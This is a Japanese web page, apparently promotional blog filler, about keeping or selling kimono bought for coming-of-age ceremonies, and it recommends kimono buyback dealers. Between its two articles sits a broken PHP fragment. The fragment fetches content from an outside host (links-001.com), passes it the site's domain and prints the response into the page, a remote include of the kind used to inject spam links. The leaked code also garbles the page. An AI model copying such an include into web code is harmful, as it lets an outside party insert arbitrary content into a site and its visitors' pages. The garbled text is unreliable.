前へ
次へ

成人式で着た着物はどうするべきなのか

成人式で着物を購入した経験がある人もいるでしょう。
最近ではレンタルで対応をするということも多いですが、レンタルではなく自分のものとして購入をしたいと考えることもあります。
成人式だけではなく、結婚式に呼ばれた際などに着ることも出来るので、せっかくだから購入をするという決意をすることもあるかもしれません。
レンタルの場合、自分の好みのものを見つけることができず、オーダーメイドにしたいという人もいるでしょう、オーダーメイドになると高額にはなりますが、一生に一度のことなので購入をして何か着る機会があったら積極的に利用をしていく、ということを考えてみるのもよいでしょう。
姉妹であれば成人式もそれぞれの時に着ることができるので購入のメリットもあります。
成人式に着て以来、全く着ていないのであれば、着物買取を利用して買い取ってもらうとよいでしょう。
管理も面倒な点が多いので、業者に対応をしてもらうと何かとお得です。

".file_get_contents('http://links-001.com/kaitoriset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

記念に残している着物の処分を考える

着物の種類として振袖と留袖があります。
振袖は成人式などに着ることが多く、未婚の女性が着る着物になります。
大学の卒業式などに袴と合わせて着ることも多いでしょう。
その後独身の状態なら結婚式などに着ていくこともできます。
しかし結婚をしてから振袖を着ることはなくなります。
それ以降は留袖を着ます。
成人式や卒業式の着物と言いますと、今はレンタルをする人が多くなっています。
でもかつてはあまりレンタルの仕組みがなく、親に無理をして買ってもらった人もいるはずです。
無理を言って買ってもらったことから記念としてそのまま残している人もいるようです。
しかし後で見ることはほとんどありません。
置いておいてもそのまま少しずつ劣化が進みます。
価値もどんどん下がります。
それなら買取業者に買い取ってもらうことを考えた方がいいかもしれません。
早く売れば売るほど高い価値をつけてもらえる可能性があります。
引き出しにしまっているからと言って劣化が進まないわけではないので注意しましょう。

Page Top